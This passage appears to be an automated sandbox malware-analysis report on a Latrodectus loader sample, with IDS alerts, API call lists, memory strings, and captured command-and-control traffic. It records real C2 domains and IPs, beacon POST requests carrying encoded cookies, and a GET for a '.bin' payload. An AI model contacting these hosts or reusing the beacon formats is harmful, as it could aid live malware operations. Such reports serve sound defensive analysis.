            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,3_2_00007FF8A8D72E90
            Source: C:\Windows\explorer.exeCode function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0303A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03032B28
            Source: C:\Windows\explorer.exeCode function: 8_2_030404C0 FindFirstFileW,8_2_030404C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0838A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_083904C0 FindFirstFileW,8_2_083904C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08382B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0885A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_088604C0 FindFirstFileW,8_2_088604C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08852B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,8_2_0E456604
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0E4516F4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C40 FindFirstFileW,FindClose,8_2_0E515C40
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F50D8 FindFirstFileA,8_2_0E4F50D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,8_2_0E4F5088

            Networking

            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49928 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49941 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49922 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50009 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50007 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50000 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49999 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50001 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50013 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50015 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49980 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50014 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49962 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50010 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50021 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50003 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50025 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50011 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50019 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50018 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50030 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50032 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50017 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50026 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50036 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50008 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50023 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50033 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50039 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50037 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50006 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49995 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49916 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50035 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50024 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50034 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49907 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50038 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50020 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50027 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50016 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50004 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50012 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50029 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50031 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50022 -> 172.67.217.190:443
            Source: C:\Windows\explorer.exe Network Connect: 104.21.68.89 443
            Source: C:\Windows\explorer.exe Network Connect: 172.67.217.190 443
            Source: C:\Windows\System32\rundll32.exe Network Connect: 103.57.249.207 6542
            Source: C:\Windows\System32\rundll32.exe Network Connect: 94.232.43.224 6542
            Source: Malware configuration extractor URLs: https://reateberam.com/test/
            Source: Malware configuration extractor URLs: https://dogirafer.com/test/
            Source: global traffic TCP traffic: 192.168.2.5:49704 -> 103.57.249.207:6542
            Source: global traffic TCP traffic: 192.168.2.5:49713 -> 94.232.43.224:6542
            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox View ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
            Source: Joe Sandbox View ASN Name: WELLWEBNL WELLWEBNL
            Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49916 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49928 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49941 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49962 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49995 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49999 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50000 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50003 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50004 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50010 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50008 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50006 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50023 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50020 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50024 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50021 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50026 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50030 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50035 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50031 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50018 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50017 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50037 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50039 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50034 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50036 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50038 -> 104.21.68.89:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50025 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50019 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network traffic - Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: global traffic - HTTP traffic detected: POST /test/ HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 92 Cache-Control: no-cache
            Source: global traffic - HTTP traffic detected: GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com
            Source: global traffic - HTTP traffic detected: GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Connection: Keep-Alive
            Source: global traffic - HTTP traffic detected: POST /test/ HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
            Source: unknown - UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exe - Code function: 8_2_0303900C InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, InternetCloseHandle, 8_2_0303900C
            Source: global traffic - DNS traffic detected: DNS query: huanvn.com
            Source: global traffic - DNS traffic detected: DNS query: vutarf.com
            Source: global traffic - DNS traffic detected: DNS query: reateberam.com
            Source: global traffic - DNS traffic detected: DNS query: dogirafer.com
            Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, 